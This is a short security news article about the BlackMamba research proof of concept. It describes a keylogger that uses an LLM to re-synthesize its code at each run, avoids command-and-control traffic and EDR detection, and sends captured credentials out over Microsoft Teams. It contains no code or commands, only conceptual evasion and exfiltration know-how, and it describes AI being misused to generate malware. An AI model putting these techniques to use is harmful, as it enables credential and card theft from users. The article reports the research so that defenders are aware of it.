
Researchers have come up with a report about an attack called as BlackMamba, which exploits a large language model (LLM) technology on which ChatGPT is based to synthesize a polymorphic keylogger functionality on the fly.
The attack is truly polymorphic in that every time BlackMamba executes, it resynthesizes its keylogging capability. It demonstrates how AI can allow the malware to dynamically modify benign code at runtime without any C2 infrastructure, allowing it to go past current automated security systems that are configured to look out for this type of behavior to detect attacks.
The attack was tested against an EDR system that was not identified specifically, but characterized as industry leading solution, often resulting in zero alerts or detections.
Uncovering the capabilities
BlackMamba with its built-in keylogging ability can collect sensitive information from a device, including usernames, passwords, and credit card numbers. Once this data is captured, the malware uses a common and trusted collaboration platform “Microsoft Teams” to send the collected data to a malicious Teams channel.
With that data, attackers can exploit the data in various nefarious ways, selling it on the Dark Web or using it for further attacks.
Why Microsoft Teams ?
MS Teams is a legitimate communication and collaboration tool that is widely used by organizations, so malware authors can leverage it to bypass traditional security defenses, such as firewalls and intrusion detection systems. Also, the data is sent over encrypted channels, and it is difficult to detect that the channel is being used for exfiltration.
The delivery system of BlackMamba is based on an open-source Python package, it allows developers to convert Python scripts into standalone executable files that can be run on various platforms, including Windows, macOS, and Linux.
AI-powered attacks like this will become more common now as threat actors create polymorphic malware that leverages ChatGPT and other sophisticated, data-intelligence systems based on LLM. This will force automated security technology to evolve as well to manage and combat these threats.
Against the tradition, not using any C2 communication and generating new, unique code at runtime, malware like BlackMamba is virtually undetectable by today’s predictive security solutions. If organization believe an EDR can thwart unknown attacks, then here comes the sophisticated BlackMamba that use AI to demonstrates its capabilities.
The security landscape will have to evolve alongside attacker’s use of AI to keep up with the more sophisticated attacks that are on the horizon. Until then, organizations need to remain vigilant, keep their security measures up to date and adapt to new threats that emerge by operationalizing cutting-edge research being conducted in this space.
This research was documented and PoC demonstrated by the researchers from HYAS labs